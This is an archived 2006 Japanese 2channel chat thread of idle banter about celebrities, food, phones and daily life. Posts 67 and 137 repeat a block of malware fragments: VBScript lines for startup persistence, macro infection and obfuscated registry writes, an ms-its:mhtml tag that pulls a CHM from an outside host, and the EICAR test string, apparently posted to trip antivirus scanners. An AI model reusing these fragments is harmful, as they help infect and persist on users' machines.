2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

SONY

1 :おいら名無しさん(´ー`)ノ :2006/10/31(火) 07:42:12 ID:bQtAyPYl
新スレです。

2 :おいら名無しさんヽ(´ー`)ノ:2006/10/31(火) 07:42:52 ID:bQtAyPYl
自宅の1階にセブンイレブンがあればいいのに

3 :おいら名無しさん(´ー`)ノ :2006/10/31(火) 16:23:06 ID:???
まだ16番目にある

4 :BLACK ◆JOKERlPkKU :2006/10/31(火) 19:32:35 ID:djzqSQoS
何を語るんだ?

5 :おいら名無しさん(´ー`)ノ :2006/10/31(火) 19:52:08 ID:???
何を語ろう..

6 :BLACK ◆JOKERlPkKU :2006/10/31(火) 23:34:57 ID:djzqSQoS
くそにー

7 :おいら名無しさんヽ(´ー`)ノ:2006/11/01(水) 01:01:10 ID:???


8 :BLACK ◆JOKERlPkKU :2006/11/01(水) 02:23:05 ID:AOXr+O0d
ヽ(`Д´)ノウワァァァァァン

9 :おいら名無しさん(´ー`)ノ :2006/11/01(水) 18:54:19 ID:???
uwawa!


10 :おいら名無しさん(´ー`)ノ :2006/11/02(木) 22:36:46 ID:TnQHmj3O
ニニフティを上場?

11 :花粉ちゃん:2006/11/03(金) 13:25:40 ID:???
私ヴァイオのノートを2台も持ってるんですよ。
バッテリー交換は来週連絡があるそうです。
それまで火を噴きませんように。

12 :おいら名無しさん(´ー`)ノ :2006/11/03(金) 17:47:42 ID:???
水が出る不具合だと水不足解消につながる

13 :花粉ちゃん:2006/11/03(金) 18:00:22 ID:???
モンゴルの遊牧民に売れそうです。

14 :花粉ちゃん:2006/11/03(金) 18:00:57 ID:???
矢島アナのメガネがかわいいです。

15 :おいら名無しさん(´ー`)ノ :2006/11/03(金) 19:23:51 ID:???
ブログばっかりで
自分で自作したHPって減ってるんですかね?

16 :花粉ちゃん:2006/11/03(金) 23:15:56 ID:???
そうです。

17 :おいら名無しさん(´ー`)ノ :2006/11/05(日) 01:33:40 ID:???
http://www.pref.chiba.lg.jp/syozoku/b_kouhou/logo/kana-1.jpg

18 :おいら名無しさん(´ー`)ノ :2006/11/05(日) 19:55:04 ID:???
aibuさんかわいいづ

19 :花粉ちゃん:2006/11/05(日) 22:58:29 ID:???
メタボリックがどうこう言ってる相武さんと
部屋のCMの相武さんが猛烈にかわいいです。
どんどんかわいくなっていきます。
ミスドのときだけかわいくない。

20 :花粉ちゃん:2006/11/06(月) 17:36:23 ID:???
阿部美穂子が男児を出産!

21 :ミギ:2006/11/06(月) 17:58:01 ID:???
おめでとうございます!!

22 :花粉ちゃん:2006/11/06(月) 17:58:57 ID:???
松尾陛下のメイクが変わりました。

23 :花粉ちゃん:2006/11/06(月) 19:38:23 ID:???
かわいいポッキーのCMが新しくなりました。

24 :ミギ:2006/11/06(月) 19:57:38 ID:???
単独の方がかわいかった気がしますが
まだかなり可愛いです

25 :ミギ:2006/11/07(火) 17:51:31 ID:UOLSofEA
たつまきうおお

26 :花粉ちゃん:2006/11/07(火) 18:02:56 ID:???
9人死亡って日本初ですかね。

27 :花粉ちゃん:2006/11/07(火) 18:07:21 ID:???
夕食の皿うどんに何を入れればいいのか

28 :ミギ:2006/11/07(火) 18:19:32 ID:UOLSofEA
にんじん

29 :花粉ちゃん:2006/11/07(火) 19:46:11 ID:???
パック入りの中華具材セットを買ってきました。
にんじんも入ってます。
これとキャベツと竹輪を入れよう。

30 :花粉ちゃん:2006/11/07(火) 21:24:25 ID:???
皿うどんはなぜこんなにうまいのか。
素人が作っても絶対失敗しない魔法の料理。

31 :おいら名無しさんヽ(´ー`)ノ:2006/11/07(火) 22:24:25 ID:???
イタイHP http://www.rak2.jp/town/user/kimukimuxp/

32 :おいら名無しさん(´ー`)ノ :2006/11/08(水) 21:36:25 ID:???
ノーベル賞を超える賞を創設できないか。

33 :おいら名無しさん(´ー`)ノ :2006/11/08(水) 21:40:51 ID:???
手話ちゃん

34 :おいら名無しさん(´ー`)ノ :2006/11/08(水) 21:45:31 ID:???
日本で政権交代を容易にする方策として、
参議院と衆議院をそっくりそのまま入れ替える方法を考えました。

酒飲みながらとはいえ16年生きてきて初めて思いつきました

35 :おいら名無しさん(´ー`)ノ :2006/11/08(水) 21:46:15 ID:???
26年の間違いです


よくある参院不要論の逆で衆院を撲滅してみてはどうでしょうか!?

36 :おいら名無しさん(´ー`)ノ :2006/11/08(水) 21:46:54 ID:???
ただ、私は別に政権交代論者というわけでもないので
別に胴でも良かった

37 :花粉ちゃん:2006/11/08(水) 22:09:53 ID:???
酔うとんか?

38 :ミギ:2006/11/09(木) 08:19:52 ID:???
酔うどん??

39 :ミギ:2006/11/09(木) 08:21:39 ID:???
イザム???

40 :花粉ちゃん:2006/11/09(木) 11:42:20 ID:???
イザムめ!!!
吉岡さんかなり好きだったのに。

41 :花粉ちゃん:2006/11/09(木) 13:46:20 ID:???
吉岡さん妊娠3か月! ぐぇぇぇ!

42 :おいら名無しさん(´ー`)ノ :2006/11/10(金) 00:20:30 ID:???
tyotto酷い話です

43 :花粉ちゃん:2006/11/10(金) 15:18:40 ID:???
はらたいら

44 :花粉ちゃん:2006/11/10(金) 16:52:23 ID:???
おいミギ、おれのYES係になれ!

45 :花粉ちゃん:2006/11/10(金) 17:40:48 ID:???
市川寛子さん合格おめでとうございます!

46 :ミギ:2006/11/10(金) 19:31:33 ID:???
どんな係りですか!?

47 :花粉ちゃん:2006/11/10(金) 19:44:00 ID:???
> 埼玉県北部の町立中学校の男性教諭(41)が、担任する3年生の
> クラスで、男子生徒3人を「YES係」と呼び、教材を運ばせるなど
> していたことが10日、わかった。教諭は他の生徒の前で、
> 「YES係は(『はい、はい』と自分の言うことを聞く)奴隷みたいなもの」
> と発言していたという。

48 :ミギ:2006/11/10(金) 21:28:27 ID:???
戒名を三千点にしてほしい

49 :おいら名無しさん(´ー`)ノ :2006/11/12(日) 11:58:22 ID:???
ツカサに注目しています

50 :花粉ちゃん:2006/11/12(日) 13:30:44 ID:???
ウィークリーマンションですか?

51 :おいら名無しさん(´ー`)ノ :2006/11/12(日) 19:50:41 ID:???
あの社長の経歴とHPに注目して印す


52 :花粉ちゃん:2006/11/12(日) 21:05:58 ID:???
私は水野ちはるですね。

53 :花粉ちゃん:2006/11/12(日) 23:25:31 ID:???
最近あの社長はCM出てないんでしょうか。

54 :花粉ちゃん:2006/11/13(月) 13:05:48 ID:???
フォークダンスDE成子坂

55 :ミギ:2006/11/13(月) 18:07:33 ID:???
芸人の死はつらいです

56 :ミギ:2006/11/13(月) 19:27:48 ID:???
おしお!

57 :花粉ちゃん:2006/11/13(月) 21:55:40 ID:???
矢田さんのばか!

58 :花粉ちゃん:2006/11/14(火) 13:47:51 ID:???
以前注目してのにその後忘れ去っていた満島ひかりさんですが
昼のドラマで毎日見てるうちに猛烈にかわいく思えてきました。
でも夕方になるともう忘れてます。

59 :おいら名無しさんヽ(´ー`)ノ:2006/11/14(火) 17:56:41 ID:???
Folder5の人ですね。

60 :花粉ちゃん:2006/11/14(火) 20:11:17 ID:???
はいその人です。
『紅の紋章』でなかなかいい役をもらってます。

61 :おいら名無しさん(´ー`)ノ :2006/11/14(火) 23:09:25 ID:???
わおおおおん


62 :おいら名無しさん(´ー`)ノ :2006/11/14(火) 23:12:40 ID:???
かなり自殺がはやって印す

63 :花粉ちゃん:2006/11/14(火) 23:54:38 ID:???
流行りすぎてもう把握できなくなりました。
いったい何人しんだのか。

64 :花粉ちゃん:2006/11/15(水) 15:17:31 ID:???
nico.買おうかなぁ。。。

65 :ミギ:2006/11/15(水) 20:48:19 ID:gUHm09OV
つなみうぉぁ

66 :花粉ちゃん:2006/11/15(水) 21:08:19 ID:???
何メートル

67 :おいら名無しさんヽ(´ー`)ノ:2006/11/15(水) 21:16:56 ID:???
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\


68 :おいら名無しさん(´ー`)ノ :2006/11/15(水) 23:14:17 ID:???
naniyara暗号が・・・

69 :おいら名無しさんヽ(´ー`)ノ:2006/11/16(木) 09:49:08 ID:???
藤原紀香さんが!

70 :おいら名無しさんヽ(´ー`)ノ:2006/11/16(木) 09:53:44 ID:???
>>64
私も青のnico.を持っています。

71 :花粉ちゃん:2006/11/16(木) 11:38:01 ID:???
陣内め!
というか紀香はあまり好きじゃないのでどうでもいいです。
紀香の二年後輩のミス日本は友達だったんですが音信不通。

72 :花粉ちゃん:2006/11/16(木) 11:44:51 ID:???
>>70
nico.すごくほしいんですけど、古いタイプのW-SIM入りなんですよね?
nico.の中身なしは12,800円なので、それと新型W-SIMを買って
スーパーnico.にしたいんです。ちょっと割高だけどこだわり。
ウィルコムから純正スーパーnico.が出るってことはないでしょうねぇ。。。

73 :花粉ちゃん:2006/11/16(木) 11:46:59 ID:???
何色にしよっかなぁ〜。
オレンジが好きなんですが、黄色しかないみたいですね。
やっぱチョコか、新しく出るグレーがいいかな。
この際かけ放題にプラン変更しよっと。

74 :ミギ:2006/11/16(木) 21:32:59 ID:???
ニコってなんですか

75 :ミギ:2006/11/16(木) 21:34:06 ID:???
ぃま上野にいます

76 :おいら名無しさんヽ(´ー`)ノ:2006/11/16(木) 22:07:52 ID:???
上野はおいらの心の駅だー♪

77 :おいら名無しさんヽ(´ー`)ノ:2006/11/16(木) 22:10:20 ID:???
ニコとは、ほとんど通話しかできないかわいいPHSです。
新型W-SIMが出るんですか。
脳内通話機能付きとか?

78 :花粉ちゃん:2006/11/16(木) 23:30:31 ID:???
上野発の夜行列車で青森いくんですね!

79 :花粉ちゃん:2006/11/16(木) 23:33:43 ID:???
新型W-SIMは差し替えるだけで料金変わらずにデータ通信が速くなるんです。
でもよく考えたら通話しか使わないから普通のnico.でもいいかな。。。

80 :花粉ちゃん:2006/11/16(木) 23:35:23 ID:???
ミギさんもウィルコムにして2,900円で私と通話しまくりましょうよ!

81 :ミギ:2006/11/17(金) 10:14:36 ID:IBB0FR/O
断る

82 :花粉ちゃん:2006/11/17(金) 11:05:06 ID:???
いま奥歯の治療中で、上からニセの歯をかぶせる一歩手前なので
削られた奥歯がひとまわり小さくなってます。悲しいです。
小さい奥歯のまま十日間やり過ごさないといけません。

83 :花粉ちゃん:2006/11/17(金) 14:14:05 ID:???
多岐川裕美の娘のストーブのCMかわいいです。

84 :花粉ちゃん:2006/11/17(金) 14:20:19 ID:???
イエロージェネレーション解散!

85 :おいら名無しさんヽ(´ー`)ノ:2006/11/17(金) 18:57:14 ID:???
なんですって!
割りと好きでした。

86 :花粉ちゃん:2006/11/17(金) 21:49:38 ID:???
私もわりと好きでした。
どこかどうってこともないんですが、妙に真剣な態度に好感もってました。
ルックスのかわい過ぎないリアルさも良かった。

87 :おいら名無しさん(´ー`)ノ :2006/11/18(土) 00:42:24 ID:???
平成15年に「スロヴェニア」を「スロベニア」、「チェッコ」を「チェコ」、「サイプロス」を「キプロス」

88 :おいら名無しさん(´ー`)ノ :2006/11/18(土) 00:43:28 ID:???
チェッコtte言って増したっけ記憶が

89 :花粉ちゃん:2006/11/18(土) 00:54:58 ID:???
ミギさんもミギーに改名

90 :花粉ちゃん:2006/11/18(土) 12:22:56 ID:???
ミムラめ!

91 :ミギ:2006/11/18(土) 12:54:19 ID:???
ミムラッギー

92 :花粉ちゃん:2006/11/18(土) 13:58:23 ID:???
石原さとみを消毒して宗教色を消し去りたい。

93 :花粉ちゃん:2006/11/18(土) 14:39:16 ID:???
大橋アナめ!

94 :花粉ちゃん:2006/11/18(土) 15:02:38 ID:???
石原さとみのくちびるの形は神ちゃんの最高傑作に近いです。

95 :花粉ちゃん:2006/11/18(土) 19:32:32 ID:???
替え玉OKの焼きそば専門店ってどうですかね?

96 :花粉ちゃん:2006/11/18(土) 20:14:44 ID:???
国際宇宙ステーションの中が私の部屋より散らかってるのを見て少し安心しました。

97 :おいら名無しさんヽ(´ー`)ノ:2006/11/18(土) 20:35:02 ID:???
収納スペースはないんですよね?

98 :花粉ちゃん:2006/11/18(土) 21:44:14 ID:???
ないんですか?

99 :花粉ちゃん:2006/11/18(土) 21:45:02 ID:???
うちにはものすごく小さい壁のくぼみがあることはあります。

100 :花粉ちゃん:2006/11/18(土) 21:47:10 ID:???
自分で作った焼きそばがうますぎて驚愕しました。
クレイジーソルトとカレー粉を入れると誰が作ってもうまくなる。

101 :おいら名無しさんヽ(´ー`)ノ:2006/11/18(土) 22:52:41 ID:???
焼そばを作った事がありません。

102 :花粉ちゃん:2006/11/18(土) 23:40:27 ID:???
ある意味、人はみな焼きそばの前では赤子のようなものですよ。

103 :花粉ちゃん:2006/11/18(土) 23:41:47 ID:???
ニコですけど、12月中旬の新型W-SIM発売まで待つことにしました。
チョコ色にします。かけ放題♪

104 :ミギ:2006/11/19(日) 01:36:23 ID:AlIHJ6HO
焼きそばの替え玉は
ラーメンのスープにあたるものがないので
底を解決すれば

105 :おいら名無しさんヽ(´ー`)ノ:2006/11/19(日) 02:06:28 ID:T+WfA79v
>>1

106 :花粉ちゃん:2006/11/19(日) 12:00:40 ID:???
ラーメンのスープにあたるものは紅しょうがです!

107 :花粉ちゃん:2006/11/19(日) 12:14:45 ID:???
神ちゃんタスケテ (;´Д`)

108 :花粉ちゃん:2006/11/20(月) 18:00:18 ID:???
北朝鮮ダンディ族

109 :ミギ:2006/11/20(月) 23:01:39 ID:UxPvqHvl
4ちゃんの夜のニュース

110 :ミギ:2006/11/20(月) 23:03:39 ID:UxPvqHvl
私の仕事なんですが公務員でせ

111 :花粉ちゃん:2006/11/20(月) 23:11:12 ID:???
公務員め!

112 :ミギ:2006/11/20(月) 23:12:16 ID:UxPvqHvl
グフフあ仝

113 :ミギ:2006/11/20(月) 23:13:23 ID:UxPvqHvl
わりと発言がマイルドになったはずです

114 :ミギ:2006/11/20(月) 23:20:16 ID:UxPvqHvl
4ちゃんひでい

115 :花粉ちゃん:2006/11/20(月) 23:32:22 ID:???
知識の宝庫のようなところで働いておられるのでは

116 :花粉ちゃん:2006/11/20(月) 23:38:34 ID:???
こっちで4ちゃんはTBSです。

117 :おいら名無しさん(´ー`)ノ :2006/11/20(月) 23:40:55 ID:???
全国統一すればいいのに

118 :花粉ちゃん:2006/11/20(月) 23:54:38 ID:???
チャンネル番号の統一こそが真のネット革命

119 :花粉ちゃん:2006/11/20(月) 23:57:52 ID:???
スープを全部飲み干したカラのどんぶりに替え玉を頼んだら断られますかね?

120 :花粉ちゃん:2006/11/21(火) 14:59:39 ID:???
斎藤茂太氏!

121 :おいら名無しさん(´ー`)ノ :2006/11/21(火) 20:07:23 ID:???
知らないです

122 :おいら名無しさんヽ(´ー`)ノ:2006/11/21(火) 21:53:11 ID:???
北杜夫さんのお兄さんですね。

123 :花粉ちゃん:2006/11/22(水) 20:51:31 ID:???
明日早起きできたら買ってきます!
http://japanese.engadget.com/2006/11/21/willcom-nico-bic-yodobashi-edition/

124 :花粉ちゃん:2006/11/22(水) 21:00:00 ID:???
やっぱやめます。
白地でないとnico.じゃないや。

125 :おいら名無しさんヽ(´ー`)ノ:2006/11/22(水) 21:10:32 ID:???
これはまたすごい色ですね。

126 :花粉ちゃん:2006/11/22(水) 22:36:00 ID:???
やっぱりヨドバシのほう買おうかなぁ〜

127 :花粉ちゃん:2006/11/22(水) 22:46:10 ID:???
>>125
私がコレに飽きたころに名無しさんもタイミング良く
青いのに飽きてたら、ガワだけ交換しませんか?

128 :おいら名無しさんヽ(´ー`)ノ:2006/11/22(水) 23:24:44 ID:???
>>127
う〜ん、飽きるには2年の歳月がw

129 :花粉ちゃん:2006/11/23(木) 13:20:43 ID:???
黒地に白ボタンのヨドバシモデルを買ってきました!
ついでに定額コースに変更してきたので名無しさん、
私としゃべりまくりませんか!

130 :おいら名無しさんヽ(´ー`)ノ:2006/11/23(木) 15:04:06 ID:???
私は、つなぎ放題なんですよ。

131 :花粉ちゃん:2006/11/23(木) 15:48:19 ID:???
この場合正しい答は「断る」です。
それがミギさんスレの掟。

132 :おいら名無しさん(´ー`)ノ :2006/11/23(木) 17:15:38 ID:???
5ンwン越しです

133 :花粉ちゃん:2006/11/23(木) 17:34:49 ID:???
5年越しですか

134 :ミギ:2006/11/23(木) 20:47:47 ID:bFPNEeVh
こころなしか 松たか子が 顔がよくなっているき、

135 :花粉ちゃん:2006/11/23(木) 22:52:20 ID:???
『役者魂!』見てますけど、いい感じですよ。
キムタクのドラマに出てたころのようなムリヤリかわい子ちゃんに
見せるメイクをやめて普通っぽくなりました。

136 :花粉ちゃん:2006/11/23(木) 23:22:16 ID:???
小暮里江

137 :おいら名無しさんヽ(´ー`)ノ:2006/11/24(金) 01:56:26 ID:???
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\


138 :花粉ちゃん:2006/11/24(金) 13:09:27 ID:???
肉まんにポン酢かけて食べてます。
ポン酢だいすき。

139 :花粉ちゃん:2006/11/24(金) 17:49:29 ID:???
井川遥さん!

140 :おいら名無しさん(´ー`)ノ :2006/11/24(金) 19:47:02 ID:???
コンビニに飲茶があればいいですよねーー

141 :おいら名無しさん(´ー`)ノ :2006/11/24(金) 20:12:20 ID:???
http://flash24.kyodo.co.jp/photo/PN20061124/PN2006112401000421.-.-.CI0002.jpg

こわいかお

142 :花粉ちゃん:2006/11/25(土) 12:18:36 ID:???
今日歯医者に行ったら初めて見る助手のお姉さんがフッキーそっくりでした!
と言っても顔の3/4が大きなマスクに隠されているので私が見たのは私の
脳内フッキーかも知れません。

143 :花粉ちゃん:2006/11/25(土) 12:20:08 ID:???
奥歯にかぶせるクラウンがなかなか合わなくてえらく時間がかかりました。
フッキーかわいいけど腕はいまいちかも!

144 :おいら名無しさん(´ー`)ノ :2006/11/25(土) 14:57:17 ID:???
a,
石原さとみさん今かなり可愛いですね

145 :花粉ちゃん:2006/11/25(土) 15:16:28 ID:???
今かなりかわいいです。

146 :おいら名無しさん(´ー`)ノ :2006/11/25(土) 19:09:46 ID:???
タラバニ大統領って名前が・・

147 :おいら名無しさん(´ー`)ノ :2006/11/25(土) 19:10:36 ID:???
http://www.tokyo-np.co.jp/flash/2006112501000268.html

148 :おいら名無しさん(´ー`)ノ :2006/11/25(土) 19:11:45 ID:???
発想を変えてキーボード等の入力システムを放棄すれば任天堂DSに毛を生やして
マウスを接続すればそれでいいんじゃないですか 情報に取り残されないためには

149 :おいら名無しさん(´ー`)ノ :2006/11/25(土) 19:12:40 ID:9A84gy6F
私はインターンエトぁあら得る情報に対して発信の比率は9:1くらいです

150 :おいら名無しさん(´ー`)ノ :2006/11/25(土) 19:14:41 ID:9A84gy6F
言い過ぎました数%です



151 :花粉ちゃん:2006/11/25(土) 21:10:42 ID:???
タラバニ食べ放題90分2,480円

152 :花粉ちゃん:2006/11/25(土) 21:12:19 ID:???
よく洗練されたシステムなら入力は○×△の3キーだけで済むはずです!

153 :花粉ちゃん:2006/11/25(土) 21:23:03 ID:???
氷点見てますけど歌丸さん出てませんねぇ。

154 :花粉ちゃん:2006/11/25(土) 21:28:55 ID:???
石原さんの幼少時代にちびまる子ちゃんの子というのはナイス配役ですね。

155 :おいら名無しさん(´ー`)ノ :2006/11/26(日) 10:50:24 ID:???
竹内由恵さん凄まじい

156 :花粉ちゃん:2006/11/26(日) 12:00:36 ID:???
2ちゃんのあちこちで叩かれてますね。

157 :おいら名無しさん(´ー`)ノ :2006/11/26(日) 15:40:14 ID:???
ちゃんとテレ朝に入って欲しいです

158 :おいら名無しさん(´ー`)ノ :2006/11/26(日) 20:26:38 ID:???
ボブサップはどこへ

159 :花粉ちゃん:2006/11/26(日) 20:53:26 ID:???
ボブの里へ

160 :花粉ちゃん:2006/11/26(日) 20:54:04 ID:???
『氷点』第二夜見ましょう。

161 :花粉ちゃん:2006/11/26(日) 20:56:46 ID:???
石原さとみさんのくちびると鼻の形は神ちゃんの最高傑作

162 :花粉ちゃん:2006/11/26(日) 21:02:08 ID:???
しかし今私の中で一番の美人はオールブラン シリアル・ビスケットのCMの人です。
http://successmoon.blogzine.jp/tech/2006/10/post_ace6.html

163 :花粉ちゃん:2006/11/27(月) 20:48:39 ID:???
http://www.sanspo.com/geino/top/gt200611/gt2006112704.html

164 :カフカ ◆o88Rd9itqI :2006/11/27(月) 20:57:29 ID:???
 

165 :花粉ちゃん:2006/11/27(月) 21:16:40 ID:???
ヒラヌマン

166 :おいら名無しさん(´ー`)ノ :2006/11/27(月) 21:55:06 ID:???
フサフサで笑ってしまう

167 :花粉ちゃん:2006/11/28(火) 00:42:09 ID:???
大木優紀アナほんとにかわいいですね。

168 :ミギ:2006/11/29(水) 20:58:01 ID:???
星野真理がかなり可愛いです

169 :花粉ちゃん:2006/11/30(木) 01:42:09 ID:???
がっかりおっぱいの人では!?

170 :おいら名無しさんヽ(´ー`)ノ:2006/11/30(木) 07:59:56 ID:???
がっかりおっぱい?

171 :花粉ちゃん:2006/11/30(木) 15:50:48 ID:???
Google閣下に尋ねればすぐわかりますがっかりおっぱい!
リンク先に裸体があると思うのでもしセクハラと感じられたらお詫びします!

172 :花粉ちゃん:2006/11/30(木) 15:55:49 ID:???
真麻ガンバレ!

173 :おいら名無しさんヽ(´ー`)ノ:2006/11/30(木) 20:11:33 ID:???
なるほど、そういうがっかりですか。

174 :花粉ちゃん:2006/11/30(木) 22:58:15 ID:???
がっかりです!

175 :おいら名無しさん(´ー`)ノ :2006/12/01(金) 22:14:47 ID:???
期間中は、幼稚園を終えて家に戻るとテレビで幕下からの取り組みを見ており、ビデオに録画することもあるという

176 :花粉ちゃん:2006/12/02(土) 13:47:11 ID:???
aiko

177 :おいら名無しさん(´ー`)ノ :2006/12/03(日) 19:14:03 ID:???
ヤフーが10年・・・

178 :花粉ちゃん:2006/12/03(日) 20:11:33 ID:???
柴田恭兵さんはてっきり亡くなったと思ってました。

179 :ミギ:2006/12/03(日) 20:20:48 ID:???
私が目にした女性のなかで
竹内由恵さんが
ストライクど真ん中です
こころが揺さぶられまし

180 :花粉ちゃん:2006/12/04(月) 01:40:05 ID:???
おっしゃることは非常によくわかります。
私は目がやや離れ気味の女性が好きです。

181 :花粉ちゃん:2006/12/04(月) 10:56:42 ID:???
そのまんま知事選

182 :ミギ:2006/12/04(月) 21:05:23 ID:???
いけそうです

183 :おいら名無しさん(´ー`)ノ :2006/12/04(月) 23:10:06 ID:???
キャンデぃーーーずーーーーーーー

184 :おいら名無しさん(´ー`)ノ :2006/12/04(月) 23:20:42 ID:???
dreamはどこへ・・

185 :花粉ちゃん:2006/12/05(火) 00:08:32 ID:???
kana chan

186 :おいら名無しさんヽ(´ー`)ノ:2006/12/05(火) 12:38:57 ID:???
ami chan!

187 :花粉ちゃん:2006/12/05(火) 18:02:39 ID:???
「あとで戻してね」

188 :花粉ちゃん:2006/12/06(水) 22:36:20 ID:???
たいへんです!
市川寛子さんが髪形を変えました!

189 :おいら名無しさん(´ー`)ノ :2006/12/06(水) 23:11:55 ID:???
ここ何ヶ月か報道ステを見ておりません

190 :花粉ちゃん:2006/12/06(水) 23:56:56 ID:???
ミロ

191 :おいら名無しさん(´ー`)ノ :2006/12/07(木) 21:56:34 ID:???
東さん、今年の3月に学校を辞めているぞ

192 :おいら名無しさん(´ー`)ノ :2006/12/07(木) 21:59:40 ID:???
落ちるような気もします

193 :おいら名無しさん(´ー`)ノ :2006/12/07(木) 22:00:28 ID:???
落ちた後の展開を想定しているのか・・

194 :花粉ちゃん:2006/12/07(木) 22:21:10 ID:???
中退ですか!

195 :花粉ちゃん:2006/12/08(金) 19:37:56 ID:???
人生初のぎっくり腰になってしまいました。
非常につらいです。この週末はずっと寝てます。
食料もってきてください。餓死します。

196 :おいら名無しさん(´ー`)ノ :2006/12/08(金) 20:25:34 ID:???
佐川急便に頼めば何でも持ってきてくれますよ!!


197 :花粉ちゃん:2006/12/08(金) 21:01:46 ID:???
加藤ローサ生活ですね。

198 :おいら名無しさん(´ー`)ノ :2006/12/09(土) 07:48:31 ID:???
土曜朝の松尾陛下が、野田聖子に見えて・・

199 :花粉ちゃん:2006/12/09(土) 15:22:41 ID:???
おい鮭蔵!

200 :花粉ちゃん:2006/12/09(土) 15:23:29 ID:???
非常にまれですが野田聖子さんに対してもエロスを感じる瞬間があります。
これは認めざるを得ません。

201 :花粉ちゃん:2006/12/09(土) 15:25:01 ID:???
1.5日安静にしていたら伝い歩きできるまでに回復しました。
ぎっくり腰というほどのモノでもなかったかも知れません。
しかし痛かった!
今はいや〜な感じの鈍痛に変わりました。

202 :ミギ:2006/12/09(土) 15:30:25 ID:???
す、すめん

203 :花粉ちゃん:2006/12/09(土) 21:16:50 ID:???
15年前に私だけが注目していたB級アイドルの諸岡菜穂子さんが
ミステリーハンターとして帰ってきてクサノヒト親王の下で働いてるのが
本当に喜ばしいことです。

204 :花粉ちゃん:2006/12/09(土) 21:19:40 ID:???
諸岡さんはアイドルだったころは目鼻口がでかくてアンバランスで
かなり好き嫌いの別れる顔だったんですが、大人になって顔が
落ち着いてものすごい美人に見えるようになりました。

205 :おいら名無しさん(´ー`)ノ :2006/12/10(日) 08:13:49 ID:???
あなたのポイントは 5ポイントです。 (男脳度数:47.5%/女脳度数:52.5%) ・
ポイントは、-100〜100ポイントで計算され、マイナスが大きいほど、男性脳
で、それに対し、プラスが大きいほど、女性脳となります。


オーバーラップ あなたは、極端な考え方をせず中性的な考え方を持っており
、融通が利くため、問題解決の時とても役に立ちます。冷静で論理的に物事を
考える男性的な部分と、感情豊かにコミニュケーションをとれる女性的な部分
を、両方持っており、また、考え方が理解できるため、異性、同姓を問わず、た
くさんの友達ができます。ただし、恋愛に関してはポリシーをもって友達で終わ
らないように注意しましょう。


206 :花粉ちゃん:2006/12/10(日) 13:39:55 ID:???
やりますなぁ。

207 :花粉ちゃん:2006/12/12(火) 08:19:06 ID:???
佐藤ゆかりタンはもうアレだめではないですか?

208 :おいら名無しさん(´ー`)ノ :2006/12/12(火) 20:33:09 ID:???
展望は無いですね

209 :花粉ちゃん:2006/12/14(木) 13:16:14 ID:???
SONYのmylo買ってしまいました。
お届けは2月です。
これで町中でもmixiができます。
Skypeでタダ電も。

210 :花粉ちゃん:2006/12/14(木) 17:57:12 ID:???
ダブル支部長

211 :おいら名無しさん(´ー`)ノ :2006/12/14(木) 21:47:19 ID:???
うんみゃあああああああああああああああ

212 :花粉ちゃん:2006/12/15(金) 14:56:29 ID:???
稲垣メンバーを超える肩書きがついに発見されました。

> 同署は逮捕翌日に書類送検するとともに、
> 清水ボーカルが事実を認めたため、釈放した。

213 :ミギ:2006/12/15(金) 20:47:03 ID:???
今伊丹にいます

214 :花粉ちゃん:2006/12/15(金) 22:57:46 ID:???
モノレールに乗ればうちまで45分です。

215 :ミギ:2006/12/16(土) 00:13:17 ID:???
梅田にいます

216 :花粉ちゃん:2006/12/16(土) 11:35:33 ID:???
今から博多に行きます。
ノロウィルスの巣窟オイスターバーに行ってきます。
さらば!

217 :花粉ちゃん:2006/12/16(土) 11:36:41 ID:???
新宿にバラバラ死体! (;´Д`)

218 :ミギ:2006/12/16(土) 14:50:42 ID:???
よくないねえ

219 :花粉ちゃん:2006/12/17(日) 12:02:51 ID:???
博多のカプセルホテルにいます。
昨夜、通常人の半年分くらいの牡蠣を食べました。
発症予定は明日の晩です。

220 :おいら名無しさんヽ(´ー`)ノ:2006/12/17(日) 12:05:18 ID:???
おなか急降下

221 :おいら名無しさん(´ー`)ノ :2006/12/17(日) 22:48:57 ID:???
oosakadeha かばちゃんとか佐藤玉緒がテレビに出ていました

222 :花粉ちゃん:2006/12/18(月) 00:23:00 ID:???
もう戻られたんですか

223 :花粉ちゃん:2006/12/18(月) 00:38:25 ID:???
たかじんの委員会を見るチャンスでしたね。

224 :花粉ちゃん:2006/12/18(月) 13:19:56 ID:???
元お天気のチカちゃんがやせてブサイクになってます。
日本女性は全員4割体重を増やすように。
よろしくお願いいたします。

225 :おいら名無しさんヽ(´ー`)ノ:2006/12/18(月) 19:16:08 ID:???
4割も!

